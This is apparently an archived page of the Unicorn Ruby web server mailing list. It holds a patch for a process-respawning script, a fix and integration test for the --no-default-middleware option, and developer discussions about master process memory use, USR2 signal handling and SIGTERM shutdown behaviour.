+        IO_PURGATORY << io
+        io = server_cast(io)
+      end
+      @logger.info "listening on addr=#{sock_name(io)} fd=#{io.fileno}"
+      @listeners << io
+      io
+    rescue Errno::EADDRINUSE => err
+      @logger.error "adding listener failed addr=#{address} (in use)"
+      raise err if tries == 0
+      tries -= 1
+      @logger.error "retrying in #{delay} seconds " \
+                    "(#{tries < 0 ? 'infinite' : tries} tries left)"
+      sleep(delay)
+      retry
+    rescue => err
+      @logger.fatal "error adding listener addr=#{address}"
+      raise err
+    end
+  end
+
+  # reaps all unreaped processes
+  def reap_all
+    begin
+      pid, status = Process.waitpid2(-1, Process::WNOHANG)
+      pid or return
+      @logger.error "reaped #{status.inspect}"
+      @exec_pid = nil if pid == @exec_pid
+    rescue Errno::ECHILD
+      break
+    end while true
+  end
+
+  # Monitors child and receives signals forever (or until SIGKILL is sent).
+  # This handles signals one-at-a-time time.
+  # Send SIGSTOP to this process to prevent it from respawning
+  def join
+    begin
+      IO.select([@self_pipe[0]])
+      @self_pipe[0].kgio_tryread(11)
+      reap_all
+      sig = @sig_queue.shift
+
+      case sig
+      when nil # spurious wakeup
+      when :USR1 # rotate logs
+        @logger.info "unicorn-forever reopening logs..."
+        Unicorn::Util.reopen_logs
+        @logger.info "unicorn-forever done reopening logs"
+
+        # this is the only signal we always forward
+        Process.kill(sig, @exec_pid) if @exec_pid
+      when :HUP
+        # we only implement SIGHUP because we need to be aware of new
+        # sockets from updated configs
+        if @config.config_file
+          load_config!
+        else # exec binary and exit if there's no config file
+          @logger.info "SIGHUP received but config file not defined"
+        end
+      else
+        @logger.info "unhandled signal: SIG#{sig} received"
+        zero = START_CTX[:argv][0]
+        if @exec_pid
+          @logger.info("did you mean to signal `#{zero}' at PID:#@exec_pid?")
+        else
+          @logger.info("`#{zero}' not running")
+        end
+      end
+      unless @exec_pid
+        do_exec
+
+        # throttle, in case the master keeps dying, we don't want to burn
+        # cycles and fill up logs by constant respawning
+        sleep 1
+      end
+    rescue => e
+      Unicorn.log_error(@logger, "forever loop error", e)
+    end while true
+    # We don't go down easily, use SIGKILL
+  end
+
+  def sig_handler(s)
+    @sig_queue << s
+    @self_pipe[1].kgio_trywrite('^') # wakeup ourselves from IO.select
+  end
+
+  def do_exec
+    @exec_pid = fork do # This will become the unicorn master process
+      # Don't let actions on any TTY -forever may have influence us
+      Process.setsid
+
+      listener_fds = Hash[@listeners.map do |sock|
+        # IO#close_on_exec= will be available on any future version of
+        # Ruby that sets FD_CLOEXEC by default on new file descriptors
+        # ref: http://redmine.ruby-lang.org/issues/5041
+        sock.close_on_exec = false if sock.respond_to?(:close_on_exec=)
+        [ sock.fileno, sock ]
+      end]
+      ENV['UNICORN_FD'] = listener_fds.keys.join(',')
+      Dir.chdir(START_CTX[:cwd])
+      cmd = START_CTX[:argv]
+
+      # avoid leaking FDs we don't know about, but let before_exec
+      # unset FD_CLOEXEC, if anything else in the app eventually
+      # relies on FD inheritence.
+      (3..1024).each do |io|
+        next if listener_fds.include?(io)
+        io = IO.for_fd(io) rescue next
+        IO_PURGATORY << io
+        io.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC)
+      end
+
+      # exec(command, hash) works in at least 1.9.1+, but will only be
+      # required in 1.9.4/2.0.0 at earliest.
+      cmd << listener_fds if RUBY_VERSION >= "1.9.1"
+      @logger.info "executing #{cmd.inspect} (in #{Dir.pwd})"
+      exec(*cmd)
+    end
+  end
+
+  def load_config!
+    @logger.info "reloading config_file=#{@config.config_file}"
+    @config[:listeners].replace(@init_listeners)
+    @config.reload
+    @config.commit!(self)
+    Unicorn::Util.reopen_logs
+    @logger.info "done reloading config_file=#{@config.config_file}"
+  rescue StandardError, LoadError, SyntaxError => e
+    Unicorn.log_error(@logger,
+        "error reloading config_file=#{@config.config_file}", e)
+  end
+
+  # returns an array of string names for the given listener array
+  def listener_names(listeners = @listeners)
+    listeners.map { |io| sock_name(io) }
+  end
+
+  def redirect_io(io, path)
+    File.open(path, 'ab') { |fp| io.reopen(fp) } if path
+    io.sync = true
+  end
+
+  # This binds any listeners we did NOT inherit from the parent
+  def bind_new_listeners!
+    @new_listeners.each { |addr| listen(addr) }
+    raise ArgumentError, "no listeners" if @listeners.empty?
+    @new_listeners.clear
+  end
+end
-- 
Eric Wong

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 1%]

* Re: [PATCH 1/2] Integration test for --no-default-middleware option
  @ 2013-06-07  9:25  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-06-07  9:25 UTC (permalink / raw)
  To: unicorn list; +Cc: Micah Chalmer

Micah Chalmer <micah@micahchalmer.net> wrote:
> This adds an integration test to ensure that the -N option
> continues to function as documented.

Thanks for this fix.  To avoid breaking bisection, I always keep
previously-failing test cases in the same commit as the fix, so I'll
squash your commits together.

Your 2/2 came whitespace mangled, too.  The git-format-patch(1) manpage
has info for popular mailers, and git also comes with a 'send-email'
command for use in conjunction with 'format-patch'.

> +++ b/t/t0300-no-default-middleware.sh
> @@ -0,0 +1,15 @@
> +#!/bin/sh
> +. ./test-lib.sh
> +t_plan 2 "test the -N / --no-default-middleware option"
> +
> +t_begin "setup and start" && {
> +    unicorn_setup
> +    unicorn -N -D -c $unicorn_config fails-rack-lint.ru
> +    unicorn_wait_start

Existing integration tests use hard tabs for indentation,
I'll update your patch to match on my end (my personal preference is
hard tabs, especially for non-Ruby languages).

I'll push out the following unless you have objections:

--------------------------------8<----------------------------------
From: Micah Chalmer <micah@micahchalmer.net>
Subject: [PATCH] Make -N/--no-default-middleware option work

This fixes the -N (a.k.a. --no-defaut-middleware) option, which
was not working.  The problem was that Unicorn::Configurator::RACKUP
is cleared before the lambda returned by Unicorn.builder is run,
which means that checking whether the :no_default_middleware option
was set from the lambda could not detect anything.  This patch copies
it to a local variable that won't get clobbered, restoring the feature.

[ew: squashed test commit into the fix, whitespace fixes]

Signed-off-by: Eric Wong <normalperson@yhbt.net>
---
 lib/unicorn.rb                   |  6 +++++-
 t/fails-rack-lint.ru             |  5 +++++
 t/t0300-no-default-middleware.sh | 15 +++++++++++++++
 3 files changed, 25 insertions(+), 1 deletion(-)
 create mode 100644 t/fails-rack-lint.ru
 create mode 100644 t/t0300-no-default-middleware.sh

diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index f0ceffe..2535159 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -35,6 +35,10 @@ module Unicorn
     # allow Configurator to parse cli switches embedded in the ru file
     op = Unicorn::Configurator::RACKUP.merge!(:file => ru, :optparse => op)
 
+    # Op is going to get cleared before the returned lambda is called, so
+    # save this value so that it's still there when we need it:
+    no_default_middleware = op[:no_default_middleware]
+
     # always called after config file parsing, may be called after forking
     lambda do ||
       inner_app = case ru
@@ -49,7 +53,7 @@ module Unicorn
 
       pp({ :inner_app => inner_app }) if $DEBUG
 
-      return inner_app if op[:no_default_middleware]
+      return inner_app if no_default_middleware
 
       # return value, matches rackup defaults based on env
       # Unicorn does not support persistent connections, but Rainbows!
diff --git a/t/fails-rack-lint.ru b/t/fails-rack-lint.ru
new file mode 100644
index 0000000..82bfb5f
--- /dev/null
+++ b/t/fails-rack-lint.ru
@@ -0,0 +1,5 @@
+# This rack app returns an invalid status code, which will cause
+# Rack::Lint to throw an exception if it is present.  This
+# is used to check whether Rack::Lint is in the stack or not.
+
+run lambda {|env| return [42, {}, ["Rack::Lint wasn't there if you see this"]]}
diff --git a/t/t0300-no-default-middleware.sh b/t/t0300-no-default-middleware.sh
new file mode 100644
index 0000000..c017c16
--- /dev/null
+++ b/t/t0300-no-default-middleware.sh
@@ -0,0 +1,15 @@
+#!/bin/sh
+. ./test-lib.sh
+t_plan 2 "test the -N / --no-default-middleware option"
+
+t_begin "setup and start" && {
+	unicorn_setup
+	unicorn -N -D -c $unicorn_config fails-rack-lint.ru
+	unicorn_wait_start
+}
+
+t_begin "check exit status with Rack::Lint not present" && {
+	test 42 -eq "$(curl -sf -o/dev/null -w'%{http_code}' http://$listen/)"
+}
+
+t_done
-- 
Eric Wong

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 2%]

* Re: Growing memory use of master process
  @ 2013-05-15 10:35  3%         ` Lin Jen-Shin (godfat)
  0 siblings, 0 replies; 200+ results
From: Lin Jen-Shin (godfat) @ 2013-05-15 10:35 UTC (permalink / raw)
  To: unicorn list

On Wed, May 15, 2013 at 6:22 PM, Andrew Stewart
<boss@airbladesoftware.com> wrote:
> I wonder whether New Relic could be doing this.  I don't really know how
> New Relic works but the language in its configuration file suggests it
> polls each app process in the background.
>
> It would be interesting to hear what other New Relic users observe
> happening to their master process's memory footprint.

We're running on Heroku and also using NewRelic. According to my
observation, the master process is quite stable, staying roughly the
same memory footprint within 24 hours. (Heroku auto-restarts each
process each day, so I don't know what would happen after 24 hours)

We're using preload_app=true as well.

As far as I know, NewRelic's agent is running in each worker processes,
but does nothing in master process. (only a wild guess, I didn't read
the code there)
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Unicorn_rails ignores USR2 signal
  @ 2013-05-08 18:15  2%                       ` Ryan Jones (RyanonRails)
  0 siblings, 0 replies; 200+ results
From: Ryan Jones (RyanonRails) @ 2013-05-08 18:15 UTC (permalink / raw)
  To: mongrel-unicorn

We've run into the exact same problem. We spent a few good solid hours trying to
fix the problem with no avail (but we do have a 'solution').

Server specs:
Ubuntu 12.04.2 LTS (GNU/Linux 3.5.0-27-generic x86_64)

Rails & Ruby:
Rails 4.0.0.beta1
Ruby 2.0.0p0 (2013-02-24 revision 39474) [x86_64-linux]
Unicorn 4.6.2 - preload_app true
Capistrano

The first thing we tried was removing all of the gems (foreman, sidekiq, etc.)
and that didn't work. We tried preload_app false, and that worked (but this is
not the situation we want). We also tried searching for any gems that were
capturing USR2 (or any signals in general).

We tried monkey patching Kernel & Trap to see if we could pinpoint the problem,
but that didn't seem to turn up much. We then jumped in unicorn's http_server.rb
and threw in some logging. The only thing that seemed to show us was that USR2
was unable to get through to unicorn. Signals HUP, QUIT, etc. all worked fine
(and made their way through as per norm).

We then fired up strace with unicorn to see if we could 'see' the USR2 signal.
It looks almost identical to Jeffery's strace. It looks like the USR2 signal is
received by the process, but then dropped (or ignored). If we pass it a QUIT
signal it works just fine and we can see that in the strace.

So here's the chain of events that we think is occuring:

1. We start unicorn (a unicorn blessing)
2. before_fork is triggered (Signal trapping works here)
3. A unicorn is born (Signal trapping does not work here)
4. The after fork is triggered

In our situation. Once a unicorn is born, it can no longer received a USR2 (for
whatever reason). We never actually checked to see if the after fork received a
USR2.

After we managed to figure out the path of execution, we figured out a quick
fix. We actually call reexec method directly on the unicorn server in the
before_fork block in unicorn.rb. Here's our unicorn.rb
https://gist.github.com/RyanonRails/5541902

----- snip -----

before_fork do |server, worker|
  Signal.trap 'USR2' do
    puts 'Since a black hole is lurking and eating USR2s we will hit
http_server#reexec ourselves'
    server.send(:reexec)
  end
end
----- snip -----

This way we can actually force the USR2 directly on the server (since USR2 is
available inside of the before_fork).

This seems to be working well for us now. We're still frustrated that we weren't
able to find the cause of the problem, but we least we can move forward (with
minor disruption to the code/code base).

Lastly, here are our current theories as to why this could be occuring:
1. When unicorn is building it's native extensions something weird is happening
in regards to the USR2 signal
2. A gem is somehow gobbling up the signal (we were quite thorough, but we
might've missed something)

Hopefully this helps!

Thanks,
Ryan & Mike


_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 2%]

* Re: Why doesn't SIGTERM quit gracefully?
  2013-04-25 11:02  2%   ` Andreas Falk
@ 2013-04-25 18:09  0%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-04-25 18:09 UTC (permalink / raw)
  To: unicorn list; +Cc: Andreas Falk

Andreas Falk <mail@andreasfalk.se> wrote:
> On Thu, Apr 25, 2013 at 10:51 AM, Eric Wong <normalperson@yhbt.net> wrote:
> > Andreas Falk <mail@andreasfalk.se> wrote:
> >> I'm wondering why SIGINT and SIGTERM both were chosen for the quick
> >> shutdown? I agree with SIGINT but not with SIGTERM. A lot of unix
> >> tools send SIGTERM as default (kill, runit among some) and it seems to
> >> be the standard way of telling a process to quit gracefully but not
> >> among Ruby people (there are a few other ruby processes behaving the
> >> same way). I just think it's weird that the default command will exit
> >> without taking care of their current request.
> >>
> >> Also i'm not on the mailinglist so it would be great if you could cc
> >> mail@andreasfalk.se
> >
> > I think it's weird, too.  But that's what nginx does, and I based most
> > of the UI decisions on nginx (so it's easy to reuse nginx scripts
> > with unicorn).
> 
> Is it something you'd be willing to change?

If nginx developers are willing to change this, definitely.

Otherwise, at this point, I'm not certain what the ramifications of a
change would be to existing users.  Maybe an option would work, but too
many options overwhelms people.

With unicorn, I suppose having the following after_fork hook works:

   # Note: after_fork hook is run before the :QUIT handler is installed,
   # so we can't use the result of trap(:QUIT) at this point:
   after_fork do |server,worker|
     trap(:TERM) { Process.kill(:QUIT, $$) }
   end

If I had to do this all over again[1], graceful shutdown would be the
_only_ option.

[1] - I haven't released a new web server for 2013... yet :)
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Why doesn't SIGTERM quit gracefully?
  @ 2013-04-25 11:02  2%   ` Andreas Falk
  2013-04-25 18:09  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Andreas Falk @ 2013-04-25 11:02 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list

On Thu, Apr 25, 2013 at 10:51 AM, Eric Wong <normalperson@yhbt.net> wrote:
> Andreas Falk <mail@andreasfalk.se> wrote:
>> I'm wondering why SIGINT and SIGTERM both were chosen for the quick
>> shutdown? I agree with SIGINT but not with SIGTERM. A lot of unix
>> tools send SIGTERM as default (kill, runit among some) and it seems to
>> be the standard way of telling a process to quit gracefully but not
>> among Ruby people (there are a few other ruby processes behaving the
>> same way). I just think it's weird that the default command will exit
>> without taking care of their current request.
>>
>> Also i'm not on the mailinglist so it would be great if you could cc
>> mail@andreasfalk.se
>
> I think it's weird, too.  But that's what nginx does, and I based most
> of the UI decisions on nginx (so it's easy to reuse nginx scripts
> with unicorn).

Is it something you'd be willing to change? The developers behind
resque reasoned in a similar way in regards to nginx but changed it
after a while. You can read more about it here
<https://github.com/resque/resque/issues/368> and in the referenced
issues.

The change i'd like to see is to preferably have SIGTERM and SIGQUIT
swap places but at least move SIGTERM to do the same thing as SIGQUIT
do now (graceful exit).

I may be wrong but i feel that the change shouldn't completely break
anything (since it would still exit, just take a bit longer) and
switching some signals around in the nginx scripts shouldn't be that
much work? Also some people are probably using SIGINT already and
wouldn't be affected. I think the benefit in the long run of being in
line with the "standard" outweighs the hassle of converting a few
scripts.

Also perhaps with some luck the nginx developers will pick on the
changes in other software and switch theirs around too!

Thanks for a really great tool anyway!

Andreas
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 2%]

Results 1-200 of ~560   | reverse | options above
-- pct% links below jump to the message on this page, permalinks otherwise --
2012-03-09 21:48     Unicorn_rails ignores USR2 signal Yeung, Jeffrey
2012-03-09 22:24     ` Eric Wong
2012-03-09 22:39       ` Yeung, Jeffrey
2012-03-10  0:02         ` Eric Wong
2012-03-10  1:07           ` Yeung, Jeffrey
2012-03-10  1:30             ` Eric Wong
2012-03-12 21:21               ` Eric Wong
2012-03-12 22:39                 ` Yeung, Jeffrey
2012-03-12 22:44                   ` Eric Wong
2012-03-20 19:57                     ` Eric Wong
2012-03-30 22:16                       ` Yeung, Jeffrey
2012-03-30 22:51                         ` Alex Sharp
2013-05-08 18:15  2%                       ` Ryan Jones (RyanonRails)
2013-04-25  8:02     Why doesn't SIGTERM quit gracefully? Andreas Falk
2013-04-25  8:51     ` Eric Wong
2013-04-25 11:02  2%   ` Andreas Falk
2013-04-25 18:09  0%     ` Eric Wong
2013-05-15  8:52     Growing memory use of master process Andrew Stewart
2013-05-15  9:28     ` Eric Wong
2013-05-15  9:38       ` Andrew Stewart
2013-05-15  9:57         ` Eric Wong
2013-05-15 10:22           ` Andrew Stewart
2013-05-15 10:35  3%         ` Lin Jen-Shin (godfat)
2013-06-07  3:03     [PATCH 1/2] Integration test for --no-default-middleware option Micah Chalmer
2013-06-07  9:25  2% ` Eric Wong
2013-07-24  3:11  1% [PATCH] unicorn_forever: new executable to respawn masters Eric Wong
2013-08-20 14:47     A barrage of unexplained timeouts nick
2013-08-20 16:37     ` Eric Wong
2013-08-20 17:27       ` nick
2013-08-20 17:40         ` Eric Wong
2013-08-20 18:11  3%       ` nick
2013-08-20 18:49  0%         ` Eric Wong
2013-08-20 20:03  0%           ` nick
2013-08-23  1:34     Ruby 2.0 Bad file descriptor (Errno::EBADF) Port Himmerland
2013-08-23  2:04     ` Eric Wong
2013-08-23  6:21       ` port
2013-08-23  6:47         ` Eric Wong
2013-09-04 19:00  3%       ` Eric Chapweske
2013-09-04 19:29  0%         ` Eric Wong
2013-09-20 21:40     [PATCH] preload_app can take an optional block for warmup Aman Gupta
2013-09-21  8:49  3% ` Eric Wong
2013-09-21 23:10  0%   ` Aman Gupta
2013-09-23 10:58  0%     ` Eric Wong
2013-09-24 16:02     IOError: closed stream David Judd
2013-09-26 22:31  2% ` David Judd
2013-10-23 22:55     pid file handling issue Michael Fischer
2013-10-24  0:53     ` Eric Wong
2013-10-24  1:01       ` Michael Fischer
2013-10-24  2:03  3%     ` Eric Wong
2013-10-24 17:51  0%       ` Michael Fischer
2013-10-24 18:21  3%         ` Eric Wong
2013-10-24 19:57  0%           ` Michael Fischer
2013-10-25 20:34  7% [PATCH] support SO_REUSEPORT on new listeners (:reuseport) Eric Wong
2013-10-25 20:49  2% ` Eric Wong
2013-10-26  7:58 10% [PATCH] license: allow all future versions of the GNU GPL Eric Wong
2013-11-04  7:57  2% [ANN] unicorn 4.7.0 - minor updates, license tweak Eric Wong
2013-11-21 10:58  3% Best way to deploy an internal Rack app? Andrew Stewart
2013-11-21 17:22  0% ` Eric Wong
2013-11-26  1:00     Issues with PID file renaming Jimmy Soho
2013-11-26  1:20     ` Eric Wong
2013-12-10 12:46       ` Petteri Räty
2013-12-10 19:52  3%     ` Eric Wong
2013-12-10 22:44  3%       ` Petteri Räty
2013-12-11 13:54  0%         ` Michael Fischer
2013-12-12 19:15  3%           ` Petteri Räty
2013-12-12 20:51  0%             ` Eric Wong
2013-12-09  9:52  2% [PATCH] rework master-to-worker signaling to use a pipe Eric Wong
2013-12-10  0:22  0% ` Sam Saffron
2014-01-15 11:37  3% Suggestion for Named Process Bob McKinven
2014-01-15 18:19  0% ` Eric Wong
2014-01-24 11:21  2% Unicorn workers freeze from time to time Artem Pyanykh
2014-04-15  8:00  3% Workers reaped with SIGABRT - how to debug? Henrik Nyh
2014-04-15  8:43  0% ` Eric Wong
2014-04-15  9:05       ` Henrik Nyh
2014-04-15 10:34  3%     ` Aaron Suggs
2014-04-16  7:08  0%     ` Henrik Nyh
2014-04-28  9:25  0% ` Henrik Nyh
2014-04-23  1:21     Is there a cleaner way of hooking into the event loop? Sam Saffron
2014-04-23  1:30  3% ` Michael Fischer
2014-04-23  2:04  0%   ` Sam Saffron
2014-04-26  3:20     [PATCH] tests: switch to minitest Ken Dreyer
2014-04-26  6:07     ` Eric Wong
2014-05-13  0:46       ` Ken Dreyer
2014-05-13  1:13  2%     ` Eric Wong
2014-04-30 13:54     Does unicorn waits after_work to consider a worker ready? Bráulio Bhavamitra
2014-05-01  1:33     ` Eric Wong
2014-05-01 15:23       ` Bráulio Bhavamitra
2014-05-01 18:18         ` Eric Wong
2014-05-01 19:00  2%       ` Bráulio Bhavamitra
2014-05-07  8:05     [ANN] unicorn 4.8.3 - the end of an era Eric Wong
2014-05-07  9:30     ` Jérémy Lecour
2014-05-07  9:46       ` Eric Wong
2014-05-07 10:16         ` Lin Jen-Shin (godfat)
2014-05-07 10:52  3%       ` Alejandro Riera
2014-05-07 19:54  0%         ` handling SMTP subscribers to public-inboxen Eric Wong
2014-05-08  8:43  2% subscription to new ML probably working Eric Wong
2014-08-02  7:51     Please move to github Gary Grossman
2014-08-02  8:50     ` Eric Wong
2014-08-02 19:07       ` Gary Grossman
2014-08-02 20:15  3%     ` Eric Wong
2014-08-04 18:12  2% Weird Unicorn Timeout Issues (Hibernation problem?) Tony Devlin
2014-08-04 18:39     ` Eric Wong
2014-08-04 18:55       ` Daniel Condomitti
2014-08-04 19:34         ` Eric Wong
2014-08-04 20:24           ` Tony Devlin
2014-08-04 20:44             ` Eric Wong
2014-08-04 20:46               ` Eric Wong
2014-08-05 14:46  2%             ` Tony Devlin
2014-09-22  1:05     [PATCH 0/4] a few more minor cleanups pushed out Eric Wong
2014-09-22  1:05 10% ` [PATCH 2/4] remove mongrel.rubyforge.org references Eric Wong
2014-09-22  1:05 10% ` [PATCH 3/4] http: remove the keepalive requests limit Eric Wong
2014-09-22  1:05 12% ` [PATCH 4/4] http: reduce parser from 72 to 56 bytes on 64-bit Eric Wong
2014-10-03 11:34     Master hooks needed Bráulio Bhavamitra
2014-10-03 12:22     ` Eric Wong
2014-10-03 12:36       ` Valentin Mihov
2014-10-03 17:50         ` Eric Wong
2014-10-03 18:12  3%       ` Valentin Mihov
2014-10-06 15:04     Unicorn not working in GitLab 7.3 Onno van der Straaten
2014-10-06 15:07  3% ` Onno van der Straaten
2014-10-07  5:08  0%   ` Eric Wong
2014-10-09 12:24     Reserved workers not as webservers Bráulio Bhavamitra
2014-10-09 16:45  3% ` Michael Fischer
2014-10-09 17:14  0%   ` Devin Ben-Hur
2014-10-09 18:29  0%     ` Bráulio Bhavamitra
2014-10-09 17:43  0%   ` Bráulio Bhavamitra
2014-10-09 17:59  3%     ` Michael Fischer
2014-10-09 18:01  0%       ` Bráulio Bhavamitra
2014-10-24 17:33     Having issue with Unicorn Imdad
2014-10-24 17:45     ` Eric Wong
2014-10-24 18:02  1%   ` Imdad
2014-10-24 18:13  0%     ` Eric Wong
2014-10-24 18:28  0%       ` Imdad
2014-10-24 18:34             ` Eric Wong
2014-10-24 18:39               ` Imdad
2014-10-24 19:13                 ` Eric Wong
2014-10-24 19:29                   ` Imdad
2014-10-24 19:41                     ` Eric Wong
2014-10-24 19:58                       ` Imdad
2014-10-24 20:06                         ` Eric Wong
2014-10-24 20:09  3%                       ` Imdad
2014-10-24 20:17  0%                         ` Eric Wong
2014-10-24 20:35  0%                           ` Imdad
2014-10-24 20:39  0%                             ` Imdad
2014-11-14  7:19     Issue with Unicorn: Big latency when getting a request Eric Wong
2014-11-14  9:09     ` Roberto Cordoba del Moral
2014-11-14  9:32       ` Roberto Cordoba del Moral
2014-11-14 10:02         ` Eric Wong
2014-11-14 10:12           ` Roberto Cordoba del Moral
2014-11-14 10:15             ` Roberto Cordoba del Moral
2014-11-14 10:28               ` Eric Wong
2014-11-14 10:51                 ` Roberto Cordoba del Moral
2014-11-14 11:03                   ` Eric Wong
2014-11-14 15:01                     ` Roberto Cordoba del Moral
2014-11-14 18:34                       ` Eric Wong
2014-11-14 22:36  3%                     ` Roberto Cordoba del Moral
2014-12-30 16:38     Unicorn workers timing out intermittently Aaron Price
2014-12-30 18:12  0% ` Eric Wong
2014-12-30 20:02  0%   ` Aaron Price
2015-02-04 20:16  2% [PATCH] http: standalone require + reduction in binary size Eric Wong
2015-02-06 20:15  3% [PATCH] doc: update support status for Ruby versions Eric Wong
2015-02-06 22:17  4% [PATCH] fix uninstalled testing and reduce require paths Eric Wong
2015-02-09  9:12     [PATCH 1/2] const: drop constants used by Rainbows! Eric Wong
2015-02-09  9:12  6% ` [PATCH 2/2] reduce and localize constant string use Eric Wong
2015-02-10 17:06  6% [PATCH] ISSUES: add section for bugs in other projects Eric Wong
2015-02-10 17:26 14% ` Eric Wong
2015-02-12 19:09  8% [PATCH] http_server: favor ivars over constants Eric Wong
2015-02-16  2:19  4% Bug, Unicorn can drop signals in extreme conditions Steven Stewart-Gallus
2015-02-18  9:15  0% ` Eric Wong
2015-03-03 22:24     Request Queueing after deploy + USR2 restart Sarkis Varozian
2015-03-03 22:32     ` Michael Fischer
2015-03-04 19:48  3%   ` Sarkis Varozian
2015-03-04 19:51  0%     ` Michael Fischer
2015-03-04 19:58  0%       ` Sarkis Varozian
2015-03-04 20:17  0%         ` Michael Fischer
2015-03-04 20:24  0%           ` Sarkis Varozian
2015-03-04 20:27  0%             ` Michael Fischer
2015-03-04 20:35                 ` Eric Wong
2015-03-04 20:40                   ` Sarkis Varozian
2015-03-05 17:07                     ` Sarkis Varozian
2015-03-05 17:13                       ` Bráulio Bhavamitra
2015-03-05 17:28  3%                     ` Sarkis Varozian
2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
2015-03-12  1:04  5% On USR2, new master runs with same PID Kevin Yank
2015-03-12  1:45 10% ` Eric Wong
2015-03-12  6:26  8%   ` Kevin Yank
2015-03-12  6:45  7%     ` Eric Wong
2015-03-20  1:55  8%       ` Kevin Yank
2015-03-20  1:58  8%       ` Kevin Yank
2015-03-20  2:08  8%         ` Eric Wong
2015-03-24 22:43     nginx reverse proxy getting ECONNRESET Michael Fischer
2015-03-24 22:54  3% ` Eric Wong
2015-03-24 22:59       ` Eric Wong
2015-03-24 23:04         ` Michael Fischer
2015-03-24 23:23           ` Eric Wong
2015-03-24 23:29             ` Michael Fischer
2015-03-24 23:46               ` Eric Wong
2015-03-24 23:55                 ` Eric Wong
2015-03-25  9:41                   ` Michael Fischer
2015-03-25 10:12  3%                 ` Eric Wong
2015-03-27 14:32  3% $USER and $HOME shell variables not set Russell Jennings
2015-03-27 18:34  0% ` Eric Wong
2015-04-22 16:42     TeeInput leaks file handles/space Mulvaney, Mike
2015-04-22 18:38  2% ` Eric Wong
2015-04-22 19:10  2%   ` Mulvaney, Mike
2015-04-22 19:16         ` Eric Wong
2015-04-22 19:24  2%       ` Mulvaney, Mike
2015-04-24  3:08  0%         ` Eric Wong
2015-04-24 11:56  0%           ` Mulvaney, Mike
2015-04-23  9:05     Unicorn, environment variables, start and reload Jérémy Lecour
2015-04-23  9:29  2% ` Eric Wong
2015-05-07 22:16  2% [PATCH] favor kgio_wait_readable for single FD over select Eric Wong
2015-06-06  1:58     [PATCH 0/2] eliminate generic ivars from HttpRequest class Eric Wong
2015-06-06  1:58  2% ` [PATCH 2/2] http: move response_start_sent into the C ext Eric Wong
2015-06-15 22:56     [ANN] unicorn 5.0.0.pre1 - incompatible changes! Eric Wong
2015-07-06 21:41  3% ` [ANN] unicorn 5.0.0.pre2 - another prerelease! Eric Wong
2015-06-26 19:46  2% TAN: Ragel now maintained by Colm networks Eric Wong
2015-06-26 21:03  0% ` Bráulio Bhavamitra
2015-07-01 16:08     Unicorn returns blank page after no use Farjad Adamjee
2015-07-01 17:30  2% ` Eric Wong
2015-07-15 22:05  2% [PATCH] doc: remove references to old servers Eric Wong
2015-09-29  6:38     Request to follow SemVer/mention it in homepage Pirate Praveen
2015-09-29  7:36     ` Eric Wong
2015-09-29  9:26  3%   ` Jérémy Lecour
2015-09-29 19:43  0%     ` Eric Wong
2015-10-14 20:12  2% unicorn non-technical FAQ Eric Wong
2015-11-13  0:51     Shared Metrics Between Workers Jeff Utter
2015-11-13  1:23     ` Eric Wong
2015-11-13 14:33       ` Jeff Utter
2015-11-13 20:54  3%     ` Eric Wong
2015-11-17 21:45  2% [PATCH] examples: add systemd socket and service files Eric Wong
2016-01-07  3:41  4% [PUSHED] various documentation updates Eric Wong
     [not found]     <56AAAD0A.8000807@icloud.com>
2016-01-30  9:34  0% ` unicorn log attack? Eric Wong
2016-02-01  5:04  2%   ` Lawrence Pit
2016-03-07 23:08     Systemd socket inheritance fails with “not a socket file descriptor” Amir Yalon
2016-03-08  3:31     ` Eric Wong
2016-03-08  7:45       ` Amir Yalon
2016-03-08 17:39         ` Eric Wong
2016-03-08 20:32  3%       ` Amir Yalon
2016-03-09  3:51  0%         ` Eric Wong
2016-03-09 13:19  0%           ` Systemd socket inheritance fails with “not a socket file descriptor” [take2] Christos Trochalakis
2016-03-09 14:06  0%           ` Systemd socket inheritance fails with “not a socket file descriptor” Christos Trochalakis
2016-04-15  3:26     Dead PostgreSQL connections on worker restart Adam Fields
2016-04-15  5:42  2% ` Eric Wong
     [not found]     <CAL-rKu6CZ731c=uHyZ8+Fg2fhC30e-3-J26XODacUK=YrfX+5Q@mail.gmail.com>
2016-06-07 13:41     ` [PATCH] `unicorn upgrade` script resilience against exceptions Eric Wong
2016-06-07 15:17       ` Jesper Rønn-Jensen
2016-06-07 21:13 10%     ` [PATCH] examples/init.sh: update to reduce upgrade raciness Eric Wong
2016-08-05 23:49     Please join the Rack Specification discussion for `env['upgrade.websocket']` Bo
2016-08-06  1:01     ` Eric Wong
2016-08-06  3:09  3%   ` Boaz Segev
2016-10-25 22:25  2% [PATCH] relocate website to https://bogomips.org/unicorn/ Eric Wong
2016-10-31 23:08     Master wait time metric Sam Saffron
